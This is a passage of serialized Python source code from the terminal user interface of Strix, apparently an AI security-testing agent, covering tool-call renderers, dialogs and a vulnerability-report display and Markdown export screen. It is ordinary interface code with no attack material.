result.get(\"error\")\n exit_code = result.get(\"exit_code\")\n result_status = result.get(\"status\", \"\")\n\n if error and not cls._is_status_message(error):\n text.append(\"\\n\")\n text.append(\" error: \", style=\"bold #ef4444\")\n text.append(cls._truncate_line(error), style=\"#ef4444\")\n return\n\n if result_status == \"running\" or tool_status == \"running\":\n if output and output.strip():\n text.append(\"\\n\")\n formatted_output = cls._format_output(output)\n text.append_text(formatted_output)\n return\n\n if not output or not output.strip():\n if exit_code is not None and exit_code != 0:\n text.append(\"\\n\")\n text.append(f\" exit {exit_code}\", style=\"dim #ef4444\")\n return\n\n text.append(\"\\n\")\n formatted_output = cls._format_output(output)\n text.append_text(formatted_output)\n\n if exit_code is not None and exit_code != 0:\n text.append(\"\\n\")\n text.append(f\" exit {exit_code}\", style=\"dim #ef4444\")\n\n @classmethod\n def _is_status_message(cls, message: str) -> bool:\n status_patterns = [\n r\"No command is currently running\",\n r\"A command is already running\",\n r\"Cannot send input\",\n r\"Use is_input=true\",\n r\"Use C-c to interrupt\",\n r\"showing output so far\",\n ]\n return any(re.search(pattern, message) for pattern in status_patterns)\n\n @classmethod\n def _format_output(cls, output: str) -> Text:\n text = Text()\n lines = output.splitlines()\n total_lines = len(lines)\n\n head_count = MAX_OUTPUT_LINES // 2\n tail_count = MAX_OUTPUT_LINES - head_count - 1\n\n if total_lines <= MAX_OUTPUT_LINES:\n display_lines = lines\n truncated = False\n hidden_count = 0\n else:\n display_lines = lines[:head_count]\n truncated = True\n hidden_count = total_lines - head_count - tail_count\n\n for i, line in enumerate(display_lines):\n truncated_line = cls._truncate_line(line)\n text.append(\" \")\n text.append(truncated_line, style=\"dim\")\n if i < len(display_lines) - 1 or truncated:\n text.append(\"\\n\")\n\n if truncated:\n text.append(f\" ... {hidden_count} lines truncated ...\", style=\"dim italic\")\n text.append(\"\\n\")\n tail_lines = lines[-tail_count:]\n for i, line in enumerate(tail_lines):\n truncated_line = cls._truncate_line(line)\n text.append(\" \")\n text.append(truncated_line, style=\"dim\")\n if i < len(tail_lines) - 1:\n text.append(\"\\n\")\n\n return text\n\n @classmethod\n def _truncate_line(cls, line: str) -> str:\n clean_line = re.sub(r\"\\x1b\\[[0-9;]*m\", \"\", line)\n if len(clean_line) > MAX_LINE_LENGTH:\n return line[: MAX_LINE_LENGTH - 3] + \"...\"\n return line\n\n @classmethod\n def _format_command(cls, command: str) -> Text:\n return cls._highlight_bash(command)\n" }, { "path": "strix/interface/tool_components/thinking_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass ThinkRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"think\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"thinking-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n thought = args.get(\"thought\", \"\")\n\n text = Text()\n text.append(\"🧠 \")\n text.append(\"Thinking\", style=\"bold #a855f7\")\n text.append(\"\\n \")\n\n if thought:\n text.append(thought, style=\"italic dim\")\n else:\n text.append(\"Thinking...\", style=\"italic dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/todo_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\nSTATUS_MARKERS: dict[str, str] = {\n \"pending\": \"[ ]\",\n \"in_progress\": \"[~]\",\n \"done\": \"[β€’]\",\n}\n\n\ndef _format_todo_lines(text: Text, result: dict[str, Any]) -> None:\n todos = result.get(\"todos\")\n if not isinstance(todos, list) or not todos:\n text.append(\"\\n \")\n text.append(\"No todos\", style=\"dim\")\n return\n\n for todo in todos:\n status = todo.get(\"status\", \"pending\")\n marker = STATUS_MARKERS.get(status, STATUS_MARKERS[\"pending\"])\n\n title = todo.get(\"title\", \"\").strip() or \"(untitled)\"\n\n text.append(\"\\n \")\n text.append(marker)\n text.append(\" \")\n\n if status == \"done\":\n text.append(title, style=\"dim strike\")\n elif status == \"in_progress\":\n text.append(title, style=\"italic\")\n else:\n text.append(title)\n\n\n@register_tool_renderer\nclass CreateTodoRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"create_todo\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"todo-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"πŸ“‹ \")\n text.append(\"Todo\", style=\"bold #a78bfa\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict):\n if result.get(\"success\"):\n _format_todo_lines(text, result)\n else:\n error = result.get(\"error\", \"Failed to create todo\")\n text.append(\"\\n \")\n text.append(error, style=\"#ef4444\")\n else:\n text.append(\"\\n \")\n text.append(\"Creating...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ListTodosRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"list_todos\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"todo-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"πŸ“‹ \")\n text.append(\"Todos\", style=\"bold #a78bfa\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict):\n if result.get(\"success\"):\n _format_todo_lines(text, result)\n else:\n error = result.get(\"error\", \"Unable to list todos\")\n text.append(\"\\n \")\n text.append(error, style=\"#ef4444\")\n else:\n text.append(\"\\n \")\n text.append(\"Loading...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass UpdateTodoRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"update_todo\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"todo-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"πŸ“‹ \")\n text.append(\"Todo Updated\", style=\"bold #a78bfa\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict):\n if result.get(\"success\"):\n _format_todo_lines(text, result)\n else:\n error = result.get(\"error\", \"Failed to update todo\")\n text.append(\"\\n \")\n text.append(error, style=\"#ef4444\")\n else:\n text.append(\"\\n \")\n text.append(\"Updating...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass MarkTodoDoneRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"mark_todo_done\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"todo-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"πŸ“‹ \")\n text.append(\"Todo Completed\", style=\"bold #a78bfa\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict):\n if result.get(\"success\"):\n _format_todo_lines(text, result)\n else:\n error = result.get(\"error\", \"Failed to mark todo done\")\n text.append(\"\\n \")\n text.append(error, style=\"#ef4444\")\n else:\n text.append(\"\\n \")\n text.append(\"Marking done...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass MarkTodoPendingRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"mark_todo_pending\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"todo-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"πŸ“‹ \")\n text.append(\"Todo Reopened\", style=\"bold #f59e0b\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict):\n if result.get(\"success\"):\n _format_todo_lines(text, result)\n else:\n error = result.get(\"error\", \"Failed to reopen todo\")\n text.append(\"\\n \")\n text.append(error, style=\"#ef4444\")\n else:\n text.append(\"\\n \")\n text.append(\"Reopening...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass DeleteTodoRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"delete_todo\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"todo-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"πŸ“‹ \")\n text.append(\"Todo Removed\", style=\"bold #94a3b8\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict):\n if result.get(\"success\"):\n _format_todo_lines(text, result)\n else:\n error = result.get(\"error\", \"Failed to remove todo\")\n text.append(\"\\n \")\n text.append(error, style=\"#ef4444\")\n else:\n text.append(\"\\n \")\n text.append(\"Removing...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/user_message_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass UserMessageRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"user_message\"\n css_classes: ClassVar[list[str]] = [\"chat-message\", \"user-message\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n content = tool_data.get(\"content\", \"\")\n\n if not content:\n return Static(Text(), classes=\" \".join(cls.css_classes))\n\n styled_text = cls._format_user_message(content)\n\n return Static(styled_text, classes=\" \".join(cls.css_classes))\n\n @classmethod\n def render_simple(cls, content: str) -> Text:\n if not content:\n return Text()\n\n return cls._format_user_message(content)\n\n @classmethod\n def _format_user_message(cls, content: str) -> Text:\n text = Text()\n\n text.append(\"▍\", style=\"#3b82f6\")\n text.append(\" \")\n text.append(\"You:\", style=\"bold\")\n text.append(\"\\n\")\n\n lines = content.split(\"\\n\")\n for i, line in enumerate(lines):\n if i > 0:\n text.append(\"\\n\")\n text.append(\"▍\", style=\"#3b82f6\")\n text.append(\" \")\n text.append(line)\n\n return text\n" }, { "path": "strix/interface/tool_components/web_search_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass WebSearchRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"web_search\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"web-search-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n query = args.get(\"query\", \"\")\n\n text = Text()\n text.append(\"🌐 \")\n text.append(\"Searching the web...\", style=\"bold #60a5fa\")\n\n if query:\n text.append(\"\\n \")\n text.append(query, style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tui.py", "content": "import argparse\nimport asyncio\nimport atexit\nimport logging\nimport signal\nimport sys\nimport threading\nfrom collections.abc import Callable\nfrom importlib.metadata import PackageNotFoundError\nfrom importlib.metadata import version as pkg_version\nfrom typing import TYPE_CHECKING, Any, ClassVar\n\n\nif TYPE_CHECKING:\n from textual.timer import Timer\n\nfrom rich.align import Align\nfrom rich.console import Group\nfrom rich.panel import Panel\nfrom rich.style import Style\nfrom rich.text import Span, Text\nfrom textual import events, on\nfrom textual.app import App, ComposeResult\nfrom textual.binding import Binding\nfrom textual.containers import Grid, Horizontal, Vertical, VerticalScroll\nfrom textual.reactive import reactive\nfrom textual.screen import ModalScreen\nfrom textual.widgets import Button, Label, Static, TextArea, Tree\nfrom textual.widgets.tree import TreeNode\n\nfrom strix.agents.StrixAgent import StrixAgent\nfrom strix.interface.streaming_parser import parse_streaming_content\nfrom strix.interface.tool_components.agent_message_renderer import AgentMessageRenderer\nfrom strix.interface.tool_components.registry import get_tool_renderer\nfrom strix.interface.tool_components.user_message_renderer import UserMessageRenderer\nfrom strix.interface.utils import build_tui_stats_text\nfrom strix.llm.config import LLMConfig\nfrom strix.telemetry.tracer import Tracer, set_global_tracer\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_package_version() -> str:\n try:\n return pkg_version(\"strix-agent\")\n except PackageNotFoundError:\n return \"dev\"\n\n\nclass ChatTextArea(TextArea): # type: ignore[misc]\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n self._app_reference: StrixTUIApp | None = None\n\n def set_app_reference(self, app: \"StrixTUIApp\") -> None:\n self._app_reference = app\n\n def on_mount(self) -> None:\n self._update_height()\n\n def _on_key(self, event: events.Key) -> None:\n if event.key == \"shift+enter\":\n self.insert(\"\\n\")\n event.prevent_default()\n return\n\n if event.key == \"enter\" and self._app_reference:\n text_content = str(self.text) # type: ignore[has-type]\n message = text_content.strip()\n if message:\n self.text = \"\"\n\n self._app_reference._send_user_message(message)\n\n event.prevent_default()\n return\n\n super()._on_key(event)\n\n @on(TextArea.Changed) # type: ignore[misc]\n def _update_height(self, _event: TextArea.Changed | None = None) -> None:\n if not self.parent:\n return\n\n line_count = self.document.line_count\n target_lines = min(max(1, line_count), 8)\n\n new_height = target_lines + 2\n\n if self.parent.styles.height != new_height:\n self.parent.styles.height = new_height\n self.scroll_cursor_visible()\n\n\nclass SplashScreen(Static): # type: ignore[misc]\n ALLOW_SELECT = False\n PRIMARY_GREEN = \"#22c55e\"\n BANNER = (\n \" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—\\n\"\n \" β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•\\n\"\n \" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ•”β•\\n\"\n \" β•šβ•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β–ˆβ–ˆβ•—\\n\"\n \" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•—\\n\"\n \" β•šβ•β•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β• β•šβ•β•\"\n )\n\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n self._animation_step = 0\n self._animation_timer: Timer | None = None\n self._panel_static: Static | None = None\n self._version = \"dev\"\n\n def compose(self) -> ComposeResult:\n self._version = get_package_version()\n self._animation_step = 0\n start_line = self._build_start_line_text(self._animation_step)\n panel = self._build_panel(start_line)\n\n panel_static = Static(panel, id=\"splash_content\")\n self._panel_static = panel_static\n yield panel_static\n\n def on_mount(self) -> None:\n self._animation_timer = self.set_interval(0.05, self._animate_start_line)\n\n def on_unmount(self) -> None:\n if self._animation_timer is not None:\n self._animation_timer.stop()\n self._animation_timer = None\n\n def _animate_start_line(self) -> None:\n if not self._panel_static:\n return\n\n self._animation_step += 1\n start_line = self._build_start_line_text(self._animation_step)\n panel = self._build_panel(start_line)\n self._panel_static.update(panel)\n\n def _build_panel(self, start_line: Text) -> Panel:\n content = Group(\n Align.center(Text(self.BANNER.strip(\"\\n\"), style=self.PRIMARY_GREEN, justify=\"center\")),\n Align.center(Text(\" \")),\n Align.center(self._build_welcome_text()),\n Align.center(self._build_version_text()),\n Align.center(self._build_tagline_text()),\n Align.center(Text(\" \")),\n Align.center(start_line.copy()),\n Align.center(Text(\" \")),\n Align.center(self._build_url_text()),\n )\n\n return Panel.fit(content, border_style=self.PRIMARY_GREEN, padding=(1, 6))\n\n def _build_url_text(self) -> Text:\n return Text(\"strix.ai\", style=Style(color=self.PRIMARY_GREEN, bold=True))\n\n def _build_welcome_text(self) -> Text:\n text = Text(\"Welcome to \", style=Style(color=\"white\", bold=True))\n text.append(\"Strix\", style=Style(color=self.PRIMARY_GREEN, bold=True))\n text.append(\"!\", style=Style(color=\"white\", bold=True))\n return text\n\n def _build_version_text(self) -> Text:\n return Text(f\"v{self._version}\", style=Style(color=\"white\", dim=True))\n\n def _build_tagline_text(self) -> Text:\n return Text(\"Open-source AI hackers for your apps\", style=Style(color=\"white\", dim=True))\n\n def _build_start_line_text(self, phase: int) -> Text:\n full_text = \"Starting Strix Agent\"\n text_len = len(full_text)\n\n shine_pos = phase % (text_len + 8)\n\n text = Text()\n for i, char in enumerate(full_text):\n dist = abs(i - shine_pos)\n\n if dist <= 1:\n style = Style(color=\"bright_white\", bold=True)\n elif dist <= 3:\n style = Style(color=\"white\", bold=True)\n elif dist <= 5:\n style = Style(color=\"#a3a3a3\")\n else:\n style = Style(color=\"#525252\")\n\n text.append(char, style=style)\n\n return text\n\n\nclass HelpScreen(ModalScreen): # type: ignore[misc]\n def compose(self) -> ComposeResult:\n yield Grid(\n Label(\"Strix Help\", id=\"help_title\"),\n Label(\n \"F1 Help\\nCtrl+Q/C Quit\\nESC Stop Agent\\n\"\n \"Enter Send message to agent\\nTab Switch panels\\n↑/↓ Navigate tree\",\n id=\"help_content\",\n ),\n id=\"dialog\",\n )\n\n def on_key(self, _event: events.Key) -> None:\n self.app.pop_screen()\n\n\nclass StopAgentScreen(ModalScreen): # type: ignore[misc]\n def __init__(self, agent_name: str, agent_id: str):\n super().__init__()\n self.agent_name = agent_name\n self.agent_id = agent_id\n\n def compose(self) -> ComposeResult:\n yield Grid(\n Label(f\"πŸ›‘ Stop '{self.agent_name}'?\", id=\"stop_agent_title\"),\n Grid(\n Button(\"Yes\", variant=\"error\", id=\"stop_agent\"),\n Button(\"No\", variant=\"default\", id=\"cancel_stop\"),\n id=\"stop_agent_buttons\",\n ),\n id=\"stop_agent_dialog\",\n )\n\n def on_mount(self) -> None:\n cancel_button = self.query_one(\"#cancel_stop\", Button)\n cancel_button.focus()\n\n def on_key(self, event: events.Key) -> None:\n if event.key in (\"left\", \"right\", \"up\", \"down\"):\n focused = self.focused\n\n if focused and focused.id == \"stop_agent\":\n cancel_button = self.query_one(\"#cancel_stop\", Button)\n cancel_button.focus()\n else:\n stop_button = self.query_one(\"#stop_agent\", Button)\n stop_button.focus()\n\n event.prevent_default()\n elif event.key == \"enter\":\n focused = self.focused\n if focused and isinstance(focused, Button):\n focused.press()\n event.prevent_default()\n elif event.key == \"escape\":\n self.app.pop_screen()\n event.prevent_default()\n\n def on_button_pressed(self, event: Button.Pressed) -> None:\n self.app.pop_screen()\n if event.button.id == \"stop_agent\":\n self.app.action_confirm_stop_agent(self.agent_id)\n\n\nclass VulnerabilityDetailScreen(ModalScreen): # type: ignore[misc]\n \"\"\"Modal screen to display vulnerability details.\"\"\"\n\n SEVERITY_COLORS: ClassVar[dict[str, str]] = {\n \"critical\": \"#dc2626\", # Red\n \"high\": \"#ea580c\", # Orange\n \"medium\": \"#d97706\", # Amber\n \"low\": \"#22c55e\", # Green\n \"info\": \"#3b82f6\", # Blue\n }\n\n FIELD_STYLE: ClassVar[str] = \"bold #4ade80\"\n\n def __init__(self, vulnerability: dict[str, Any]) -> None:\n super().__init__()\n self.vulnerability = vulnerability\n\n def compose(self) -> ComposeResult:\n content = self._render_vulnerability()\n yield Grid(\n VerticalScroll(Static(content, id=\"vuln_detail_content\"), id=\"vuln_detail_scroll\"),\n Horizontal(\n Button(\"Copy\", variant=\"default\", id=\"copy_vuln_detail\"),\n Button(\"Done\", variant=\"default\", id=\"close_vuln_detail\"),\n id=\"vuln_detail_buttons\",\n ),\n id=\"vuln_detail_dialog\",\n )\n\n def on_mount(self) -> None:\n close_button = self.query_one(\"#close_vuln_detail\", Button)\n close_button.focus()\n\n def _get_cvss_color(self, cvss_score: float) -> str:\n if cvss_score >= 9.0:\n return \"#dc2626\"\n if cvss_score >= 7.0:\n return \"#ea580c\"\n if cvss_score >= 4.0:\n return \"#d97706\"\n if cvss_score >= 0.1:\n return \"#65a30d\"\n return \"#6b7280\"\n\n def _highlight_python(self, code: str) -> Text:\n try:\n from pygments.lexers import PythonLexer\n from pygments.styles import get_style_by_name\n\n lexer = PythonLexer()\n style = get_style_by_name(\"native\")\n colors = {\n token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]\n }\n\n text = Text()\n for token_type, token_value in lexer.get_tokens(code):\n if not token_value:\n continue\n color = None\n tt = token_type\n while tt:\n if tt in colors:\n color = colors[tt]\n break\n tt = tt.parent\n text.append(token_value, style=color)\n except (ImportError, KeyError, AttributeError):\n return Text(code)\n else:\n return text\n\n def _render_vulnerability(self) -> Text: # noqa: PLR0912, PLR0915\n vuln = self.vulnerability\n text = Text()\n\n text.append(\"🐞 \")\n text.append(\"Vulnerability Report\", style=\"bold #ea580c\")\n\n agent_name = vuln.get(\"agent_name\", \"\")\n if agent_name:\n text.append(\"\\n\\n\")\n text.append(\"Agent: \", style=self.FIELD_STYLE)\n text.append(agent_name)\n\n title = vuln.get(\"title\", \"\")\n if title:\n text.append(\"\\n\\n\")\n text.append(\"Title: \", style=self.FIELD_STYLE)\n text.append(title)\n\n severity = vuln.get(\"severity\", \"\")\n if severity:\n text.append(\"\\n\\n\")\n text.append(\"Severity: \", style=self.FIELD_STYLE)\n severity_color = self.SEVERITY_COLORS.get(severity.lower(), \"#6b7280\")\n text.append(severity.upper(), style=f\"bold {severity_color}\")\n\n cvss_score = vuln.get(\"cvss\")\n if cvss_score is not None:\n text.append(\"\\n\\n\")\n text.append(\"CVSS Score: \", style=self.FIELD_STYLE)\n cvss_color = self._get_cvss_color(float(cvss_score))\n text.append(str(cvss_score), style=f\"bold {cvss_color}\")\n\n target = vuln.get(\"target\", \"\")\n if target:\n text.append(\"\\n\\n\")\n text.append(\"Target: \", style=self.FIELD_STYLE)\n text.append(target)\n\n endpoint = vuln.get(\"endpoint\", \"\")\n if endpoint:\n text.append(\"\\n\\n\")\n text.append(\"Endpoint: \", style=self.FIELD_STYLE)\n text.append(endpoint)\n\n method = vuln.get(\"method\", \"\")\n if method:\n text.append(\"\\n\\n\")\n text.append(\"Method: \", style=self.FIELD_STYLE)\n text.append(method)\n\n cve = vuln.get(\"cve\", \"\")\n if cve:\n text.append(\"\\n\\n\")\n text.append(\"CVE: \", style=self.FIELD_STYLE)\n text.append(cve)\n\n # CVSS breakdown\n cvss_breakdown = vuln.get(\"cvss_breakdown\", {})\n if cvss_breakdown:\n cvss_parts = []\n if cvss_breakdown.get(\"attack_vector\"):\n cvss_parts.append(f\"AV:{cvss_breakdown['attack_vector']}\")\n if cvss_breakdown.get(\"attack_complexity\"):\n cvss_parts.append(f\"AC:{cvss_breakdown['attack_complexity']}\")\n if cvss_breakdown.get(\"privileges_required\"):\n cvss_parts.append(f\"PR:{cvss_breakdown['privileges_required']}\")\n if cvss_breakdown.get(\"user_interaction\"):\n cvss_parts.append(f\"UI:{cvss_breakdown['user_interaction']}\")\n if cvss_breakdown.get(\"scope\"):\n cvss_parts.append(f\"S:{cvss_breakdown['scope']}\")\n if cvss_breakdown.get(\"confidentiality\"):\n cvss_parts.append(f\"C:{cvss_breakdown['confidentiality']}\")\n if cvss_breakdown.get(\"integrity\"):\n cvss_parts.append(f\"I:{cvss_breakdown['integrity']}\")\n if cvss_breakdown.get(\"availability\"):\n cvss_parts.append(f\"A:{cvss_breakdown['availability']}\")\n if cvss_parts:\n text.append(\"\\n\\n\")\n text.append(\"CVSS Vector: \", style=self.FIELD_STYLE)\n text.append(\"/\".join(cvss_parts), style=\"dim\")\n\n description = vuln.get(\"description\", \"\")\n if description:\n text.append(\"\\n\\n\")\n text.append(\"Description\", style=self.FIELD_STYLE)\n text.append(\"\\n\")\n text.append(description)\n\n impact = vuln.get(\"impact\", \"\")\n if impact:\n text.append(\"\\n\\n\")\n text.append(\"Impact\", style=self.FIELD_STYLE)\n text.append(\"\\n\")\n text.append(impact)\n\n technical_analysis = vuln.get(\"technical_analysis\", \"\")\n if technical_analysis:\n text.append(\"\\n\\n\")\n text.append(\"Technical Analysis\", style=self.FIELD_STYLE)\n text.append(\"\\n\")\n text.append(technical_analysis)\n\n poc_description = vuln.get(\"poc_description\", \"\")\n if poc_description:\n text.append(\"\\n\\n\")\n text.append(\"PoC Description\", style=self.FIELD_STYLE)\n text.append(\"\\n\")\n text.append(poc_description)\n\n poc_script_code = vuln.get(\"poc_script_code\", \"\")\n if poc_script_code:\n text.append(\"\\n\\n\")\n text.append(\"PoC Code\", style=self.FIELD_STYLE)\n text.append(\"\\n\")\n text.append_text(self._highlight_python(poc_script_code))\n\n remediation_steps = vuln.get(\"remediation_steps\", \"\")\n if remediation_steps:\n text.append(\"\\n\\n\")\n text.append(\"Remediation\", style=self.FIELD_STYLE)\n text.append(\"\\n\")\n text.append(remediation_steps)\n\n return text\n\n def _get_markdown_report(self) -> str: # noqa: PLR0912, PLR0915\n \"\"\"Get Markdown version of vulnerability report for clipboard.\"\"\"\n vuln = self.vulnerability\n lines: list[str] = []\n\n # Title\n title = vuln.get(\"title\", \"Untitled Vulnerability\")\n lines.append(f\"# {title}\")\n lines.append(\"\")\n\n # Metadata\n if vuln.get(\"id\"):\n lines.append(f\"**ID:** {vuln['id']}\")\n if vuln.get(\"severity\"):\n lines.append(f\"**Severity:** {vuln['severity'].upper()}\")\n if vuln.get(\"timestamp\"):\n lines.append(f\"**Found:** {vuln['timestamp']}\")\n if vuln.get(\"agent_name\"):\n lines.append(f\"**Agent:** {vuln['agent_name']}\")\n if vuln.get(\"target\"):\n lines.append(f\"**Target:** {vuln['target']}\")\n if vuln.get(\"endpoint\"):\n lines.append(f\"**Endpoint:** {vuln['endpoint']}\")\n if vuln.get(\"method\"):\n lines.append(f\"**Method:** {vuln['method']}\")\n if vuln.get(\"cve\"):\n lines.append(f\"**CVE:** {vuln['cve']}\")\n if vuln.get(\"cvss\") is not None:\n lines.append(f\"**CVSS:** {vuln['cvss']}\")\n\n # CVSS Vector\n cvss_breakdown = vuln.get(\"cvss_breakdown\", {})\n if cvss_breakdown:\n abbrevs = {\n \"attack_vector\": \"AV\",\n \"attack_complexity\": \"AC\",\n \"privileges_required\": \"PR\",\n \"user_interaction\": \"UI\",\n \"scope\": \"S\",\n \"confidentiality\": \"C\",\n \"integrity\": \"I\",\n \"availability\": \"A\",\n }\n parts = [\n f\"{abbrevs.get(k, k)}:{v}\" for k, v in cvss_breakdown.items() if v and k in abbrevs\n ]\n if parts:\n lines.append(f\"**CVSS Vector:** {'/'.join(parts)}\")\n\n # Description\n lines.append(\"\")\n lines.append(\"## Description\")\n lines.append(\"\")\n lines.append(vuln.get(\"description\") or \"No description provided.\")\n\n # Impact\n if vuln.get(\"impact\"):\n lines.extend([\"\", \"## Impact\", \"\", vuln[\"impact\"]])\n\n # Technical Analysis\n if vuln.get(\"technical_analysis\"):\n lines.extend([\"\", \"## Technical Analysis\", \"\", vuln[\"technical_analysis\"]])\n\n # Proof of Concept\n if vuln.get(\"poc_description\") or vuln.get(\"poc_script_code\"):\n lines.extend([\"\", \"## Proof of Concept\", \"\"])\n if vuln.get(\"poc_description\"):\n lines.append(vuln[\"poc_description\"])\n lines.append(\"\")\n if vuln.get(\"poc_script_code\"):\n lines.append(\"```python\")\n lines.append(vuln[\"poc_script_code\"])\n lines.append(\"```\")\n\n # Code Analysis\n if vuln.get(\"code_locations\"):\n lines.extend([\"\", \"## Code Analysis\", \"\"])\n for i, loc in enumerate(vuln[\"code_locations\"]):\n file_ref = loc.get(\"file\", \"unknown\")\n line_ref = \"\"\n if loc.get(\"start_line\") is not None:\n if loc.get(\"end_line\") and loc[\"end_line\"] != loc[\"start_line\"]:\n line_ref = f\" (lines {loc['start_line']}-{loc['end_line']})\"\n else:\n line_ref = f\" (line {loc['start_line']})\"\n lines.append(f\"**Location {i + 1}:** `{file_ref}`{line_ref}\")\n if loc.get(\"label\"):\n lines.append(f\" {loc['label']}\")\n if loc.get(\"snippet\"):\n lines.append(f\"```\\n{loc['snippet']}\\n```\")\n if loc.get(\"fix_before\") or loc.get(\"fix_after\"):\n lines.append(\"**Suggested 